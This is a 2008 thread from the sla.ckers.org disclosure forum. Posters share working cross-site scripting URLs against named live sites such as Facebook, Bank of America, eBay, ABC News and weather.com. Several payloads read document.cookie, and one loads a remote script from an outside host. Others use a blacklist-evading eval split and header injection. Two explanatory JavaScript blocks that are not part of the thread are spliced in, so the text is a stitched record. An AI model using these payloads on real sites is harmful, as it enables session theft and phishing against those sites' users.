sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: So it begins
Posted by: maluc
Date: February 14, 2008 12:20AM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://secure.facebook.com/add_poll.php&price_per_response=50&max_responses=200&cc_name=john+smith&cc_cardType=86&cc_creditCardNumber=4123412312341234&cc_expMonth=1&cc_expYear=2009&cc_countryCode=US&cc_street=qwer%22%3E%3Cscript%20src%3D%22http://ha.ckers.org/s.js%22%3E%3C/script%20vvvvv%3Ee&cc_city=&cc_state=&cc_zip=&cc_save_cc=1&cc_showSave=1&cc_save_required=cc_save_required&finalize_submit=Place+Order&poll_question=question1&target_sex=0&target_age=0&target_keyword_type=0&network=0&max_responses=200&price_per_response=50&n_college=-1&n_geo=-1&keyword_selector_input=0&keyword_selector_label=&answer_1=answer1&answer_2=answer2 secure.facebook.com

Not all that useful at first glance, aside from phishing.. because of facebook's policy of fragmenting their site into different subdomains. There's not much of use in http://secure.facebook.com and http://facebook.com .

*Note - you may need to be logged in to view it. YMMV

-maluc

Re: So it begins
Posted by: maluc
Date: February 14, 2008 12:55AM

I don't know that this has also been live a full year while undisclosed - but at least 7 months.

https://epreferences.bankofamerica.com/asbs/servlet/SS?F=1410408&X=40058617572&T=40058617572&Z=asdf%22%3E%3Czz%20name%3D'zz'%20id%3D'0'%3E%3C/zz%3E%3Cscript%3Ex%3Ddocument.getElementsByName%28%27zz%27%29%5B0%5D;if(x.id%3D%3D0)%7Balert%28%271%20Phish%27%29;x.id%3D1;%7Delse%20if(x.id%3D%3D1)%7Bx.id%3D2;alert('2%20Phish');%7Delse%20alert('Red%20Phish%20Blue%20Phish')%3C/script%3E%3Cz&CID=11268:11268_2

Also included is a nifty javascript snippet to make three identical copies of the XSS execute 3 different paths of code. Particularly useful when you only want one instance of your XSS to execute, and have all subsequent copies do nothing.

-maluc

Re: So it begins
Posted by: maluc
Date: February 14, 2008 01:02AM

http://pages.ebay.com/help/tp/items-authentication.html?fromFeature=%3Cbody%20onload%3Deval(%22ale%22%2B%22rt(docu%22%2B%22ment.cookie)%22)%3E

I believe ebay employs a blacklist on keywords like 'document.cookie' and 'script' and 'alert('

-maluc
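
Why a keyword blacklist of the kind described in the post above lets this input through while output encoding neutralises it, as an added example that is not part of the thread and is not eBay's code. The three keywords are the ones the post names; the filter logic (`blacklistAllows`) and the `escapeHtml` helper are assumptions made for illustration.

```javascript
// Added example, not from the thread. The keyword list is taken from the post;
// how the real filter works is unknown, so this substring check is an assumption.
const BLACKLIST = ['document.cookie', 'script', 'alert('];

// Naive filter: accept the value unless a blacklisted keyword appears literally.
function blacklistAllows(value) {
  const lower = value.toLowerCase();
  return !BLACKLIST.some((kw) => lower.includes(kw));
}

// Output encoding for HTML text and quoted-attribute contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return value.replace(/[&<>"']/g, (ch) => map[ch]);
}

// The fromFeature value from the URL in the post, percent-decoded.
const fromPost = decodeURIComponent(
  '%3Cbody%20onload%3Deval(%22ale%22%2B%22rt(docu%22%2B%22ment.cookie)%22)%3E'
);

// The literal form that the blacklist was presumably written to catch.
const literalForm = '<script>alert(document.cookie)</script>';

function compare() {
  return {
    literalBlocked: !blacklistAllows(literalForm), // keywords present verbatim
    splitStringPasses: blacklistAllows(fromPost),  // keywords only exist after eval joins them
    encoded: escapeHtml(fromPost),                 // inert text, whatever the keywords are
  };
}

console.log(compare());
```

The blacklist inspects the request text, but the keywords only come into existence at run time inside the browser, so the check and the interpreter never see the same string. Encoding at output removes the markup characters the value needs to leave its HTML context, independent of what it spells.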

Re: So it begins
Posted by: Anonymous User
Date: February 14, 2008 06:57AM

Hi maluc! what's up? long time no see.

nice ones btw.

Re: So it begins
Posted by: Gareth Heyes
Date: February 14, 2008 07:10AM

Quote

maluc Wrote:
I believe ebay employs a blacklist on keywords
like 'document.cookie' and 'script' and 'alert('

lol do they know anything :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: So it begins
Posted by: Anonymous User
Date: February 15, 2008 08:39PM

trev Wrote:
-------------------------------------------------------
> I didn't look at thelookandsoundofperfect.com
> until now. Here you have it:
>
> http://www.thelookandsoundofperfect.com/popCover.p
> hp?img=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
> %3Cdiv%20dummy=%22
>
> Here is how you can load any Flash movie into
> their content pane (maybe I should call this
> "Flash Injection" :)
>
> http://www.thelookandsoundofperfect.com/index.php?
> page=/../../_swf/nav_xml_v3.swf?
>
> Now you only need to find a redirect on their site
> to inject a video from a third-party site. And
> here are some scripts you might want to play
> around with (don't seem vulnerable however):
>
> http://www.thelookandsoundofperfect.com/_dev/_lib/
> process_stf.php?yname=me&yemail=me@example.com&fna
> me=him&femail=him@example.com
> http://www.thelookandsoundofperfect.com/_dev/_lib/
> process_signup.php?email=me@example.com
>
> Also, XSS in a page they are linking to:
>
> http://www.soundandvisionmag.com/article.asp?secti
> on_id=60&article_id=2207&page_number=1asdf%22%2Bal
> ert('xss')%2B%22



Pfffff re-hashing the same old shit, clever guy you are, it's not a bug it's a feature! go look it up! it's a feature, a feature! not a bug, a feature1!!!!

Re: So it begins
Posted by: maluc
Date: February 16, 2008 12:55AM

hiya Ronald,
research wasn't paying the bills.. so i had to limit it a lot for a while :T

it's good to be back though, missed this place. i'll try to keep contributing ^^

Must be logged in: http://www.crunchyroll.com/inbox?q=asdf%3Cbody%20onload%3D%22alert('XSS')%22%3Eqwer

-maluc

Re: So it begins
Posted by: tx
Date: February 18, 2008 01:13PM

http://www.buy.com/retail/searchresults.asp?qu=%27%29%3Balert%28%2Fxss%2F%29%3B%2F%2F&queryType=home

-tx @ lowtech-labs.org

Re: So it begins
Posted by: Gareth Heyes
Date: February 18, 2008 01:22PM

@tx

Nice dom xss :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: So it begins
Posted by: digi7al64
Date: February 26, 2008 07:18PM

http://www.propeller.com/viewstory/2008/02/26/lauren-cleri-destroys-her-husband-on-moment-of-truth-video/?url=javascript:alert('xss')&frame=true

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: tx
Date: March 11, 2008 08:39PM

So, it's totally expected that when translating a webpage, Javascript will execute in the context of the translator site. But it seems that many sites don't take the time to ensure that the translator is properly sandboxed. Google and Yahoo both display the translation in a frame whose domain does not have access to .google.com or .yahoo.com cookies, but it appears many don't:
http://babelfish.altavista.com/babelfish/trurl_pagecontent?lp=es_en&url=http%3A%2F%2Ftx.lowtechlive.com%2Fs.php
http://www.online-translator.com/url/tran_url.asp?lang=en&url=http%3A%2F%2Ftx.lowtechlive.com%2Fs.php&direction=se&template=General&cp1=NO&cp2=NO&psubmit2.x=39&psubmit2.y=18

-tx @ lowtech-labs.org
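
The sandboxing point in the post above, worked through as an added example that is not part of the thread: which of a site's cookies script can read depends on the host that serves the translated frame. Hostnames, cookie names and the helper functions are constructed for illustration; the Path and Secure attributes are left out.

```javascript
// Added example: hostnames and cookie names below are constructed placeholders.

// Domain-match from RFC 6265 section 5.1.3. IP-literal hosts only match exactly.
function domainMatch(host, cookieDomain) {
  const h = host.toLowerCase();
  const d = cookieDomain.toLowerCase().replace(/^\./, '');
  if (h === d) return true;
  if (/^[\d.]+$/.test(h) || h.includes(':')) return false;
  return h.endsWith('.' + d);
}

// A cookie set without a Domain attribute is host-only: it goes back only to
// the exact host that set it. With Domain=, every matching subdomain gets it.
function cookieReaches(cookie, host) {
  return cookie.domain
    ? domainMatch(host, cookie.domain)
    : host.toLowerCase() === cookie.setBy.toLowerCase();
}

// Cookies that script running on frameHost can read through document.cookie.
function readableFrom(frameHost, cookies) {
  return cookies
    .filter((c) => !c.httpOnly && cookieReaches(c, frameHost))
    .map((c) => c.name);
}

// Constructed cookie jar for a hypothetical portal that also runs a translator.
const jar = [
  { name: 'session', setBy: 'www.portal.example', domain: '.portal.example' },
  { name: 'prefs', setBy: 'www.portal.example' },
  { name: 'auth', setBy: 'www.portal.example', domain: '.portal.example', httpOnly: true },
];

// Translator on a subdomain of the main site: third-party script sees 'session'.
console.log(readableFrom('translate.portal.example', jar));
// Translator on a separate registrable domain: nothing to read.
console.log(readableFrom('translate.portal-usercontent.example', jar));
```

Host-only and HttpOnly cookies narrow what a same-site translator frame can read, but serving the translated page from a separate registrable domain is the only arrangement here in which no site cookie reaches the frame.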

Re: So it begins
Posted by: LinuxPHreak
Date: March 17, 2008 12:06AM

I'm not sure if anyone mentioned this one yet, but bizrate.com has an XSS exploit as well.

Re: So it begins
Posted by: LinuxPHreak
Date: March 17, 2008 12:10AM

Wait, I should probably give the URL that I used:
http://www.bizrate.com/ratings_guide/results__SEARCH_GO--GO__SEARCH_GO.x--342__SEARCH_GO.y--16__cat_id--1__keyword--%3Cscript%3Ealert(%22XSS%22)%3C/script%3E__search_box--1__sfsk--0.html

Re: So it begins
Posted by: fragge
Date: March 17, 2008 12:53AM

56 pages of disclosure.. I pity whoever is putting all of this together.

Re: So it begins
Posted by: Malkav
Date: March 18, 2008 03:48AM

[ddanchev.blogspot.com]

at least someone is appreciating the work.

----------------------------------------------------------------------------------------------------------------

Those that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety.
--Benjamin Franklin

Re: So it begins
Posted by: Anonymous User
Date: March 23, 2008 06:20PM

I wouldn't have expected it to be that easy... astalavista.com XSS

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.astalavista.net/%3Fcmd%3Drec%26act%3Dsend&frmRec_SenderName=%22%3E%3Cscript%3Ealert%28/ouch!/%5B-1%5D%29%3C/script%3E

Re: So it begins
Posted by: nav
Date: April 07, 2008 03:48PM

Search security's unsubscribe xss.
http://searchsecurity.techtarget.com/unsubscribeConfirm/1,294679,sid14,00.html?lid=430718&lname=Webc%3Cscript%3Ealert(1)%3C/script%3East+Alert&uid=6149038&ltype=NEWS

Re: So it begins
Posted by: tx
Date: April 13, 2008 07:47PM

[abcnews.go.com]
XSS: http://abcnews.go.com/search?searchtext=%5C%27%29%3Balert%28document.cookie%29%3Balert%28document.domain%29//&type=

way too much information here: http://64.95.76.58/np6080/search2_alt.cgi?query=a%0a%0db%0a%0d&from=0&to=9&type=video&size=small
and here: http://64.95.76.58/np6080/search2_alt.cgi.bak?query=a%0a%0db%0a%0d&from=0&to=9&type=video&size=small

btw, check out the contents of the DS and DE2 cookies set for the .go.com domain

EDIT: More, more, more http://app.abcnews.go.com/app/setUsernameCookie?appRedirect=http%3A//abcnews.go.com%27%3Balert%28%27XSS%3A%5Cn%5Cn%27%2bdocument.cookie%29%3B//

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 04/14/2008 12:58PM by tx.

Re: So it begins
Posted by: shao
Date: April 30, 2008 12:28AM

http://www.galacticimperia.org/imperia/game/register.php?realm=%22%3CSCRIPT%3Ealert(/XSS/)%3C/script%3E - XSS

Re: So it begins
Posted by: nEUrOO
Date: April 30, 2008 08:22AM

Just because they sent a nice email (looking for engineers) saying they are "Nous sommes une société haut de gamme dans l’ingénierie Internet." (trans: We are a high quality company in the Internet engineering).

hxxp://www.smile.fr/recherche/(SearchText)/<script>alert("No, you're not!");</script>

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 1 time(s). Last edit at 04/30/2008 08:23AM by nEUrOO.

Re: So it begins
Posted by: Kyo
Date: May 02, 2008 03:13PM

don't know if this has been posted, but:

http://members.freewebs.com/Directory/viewSites.jsp?query=%3C/script%3E%3Cscript%3Ealert(/now%20this%20is%20just%20sad.%20It%20took%20me%20less%20than%20a%20minute/)%3C/script%3E&x=0&y=0

I was setting up a freewebs account, and I saw the search box, so I figured, why the hell not?

Re: So it begins
Posted by: KleverOneR
Date: May 22, 2008 03:33PM

Came across this while testing someone's weblog, could be useful later

https://www.thrivesmart.com/login?to_p=%2Farticles%3Fedit%3Dtrue&to_b=anonymous&_notice=%3Cscript%20type='text/javascript'%3Ealert(document.cookie);%20alert('KleverOneR');%3C/script%3E

Blog of the creators of dictionary.com, thesaurus.com, reference.com:

http://www.lexico.com/blog/index.php?s=%3Cscript+type%3D%27text%2Fjavascript%27%3Ealert%28document.cookie%29%3Balert%28%27KleverOneR%27%29%3B%3C%2Fscript%3E&submit=Go%21



Edited 2 time(s). Last edit at 05/22/2008 03:55PM by KleverOneR.

Re: So it begins
Posted by: DoctorDan
Date: May 26, 2008 12:26AM

food.aol.com...
http://tinyurl.com/477eh7

gave me a chuckle

Re: So it begins
Posted by: Anonymous User
Date: May 27, 2008 04:39PM

Pffff... #46 with IQ of 94

http://www.iqleague.com/award/fcT4qLMWuEe9wJqpASG2jw

Re: So it begins
Posted by: trev
Date: May 29, 2008 09:02AM

http://trail.motionbased.com/trail/security/login.mb?username.value=%3Cscript%3Ealert('xss')%3C/script%3E

Re: So it begins
Date: June 06, 2008 02:14AM

http://doc.bleedingthreats.net/bin/login/Main/WebPreferences?username=&password=&origurl=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Re: So it begins
Date: June 07, 2008 02:20AM

http://www.accessplace.com/redirect.php?redir=http%3A%2F%2Fwww.google.com%0ALocation:javascript:%0A%0A%3Cscript%3Ealert(0)%3C/script%3E

Re: So it begins
Posted by: digi7al64
Date: June 10, 2008 11:16PM

http://www.pbs.org/kcet/wiredscience/page/search.html?q=%22%3E%3Cscript%3Ealert%28%27hello+mum%27%29%3B%3C%2Fscript%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Date: June 11, 2008 01:43AM

http://www.weather.com/weather/map/interactive/?zoom=6&lat=42&long=-7%22%3E%3Cbody%20onload=alert(1)%206&interactiveMapLayer=radar&plot=true&animation=true

http://www.accuweather.com/us-city-list.asp?zipcode=%22%3E%3Cbody%20onload=alert(1)%20%20x=%22&submit=GO&u=1&partner=accuweather

http://www.intellicast.com/local/default.aspx?query=aaaa%22,%200);alert(1);//

It's raining XSS =oD

Re: So it begins
Posted by: Anonymous User
Date: June 14, 2008 07:07AM

http://technorati.com/account/lost-password?username=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E

C'mon... are fruits able to hang lower?
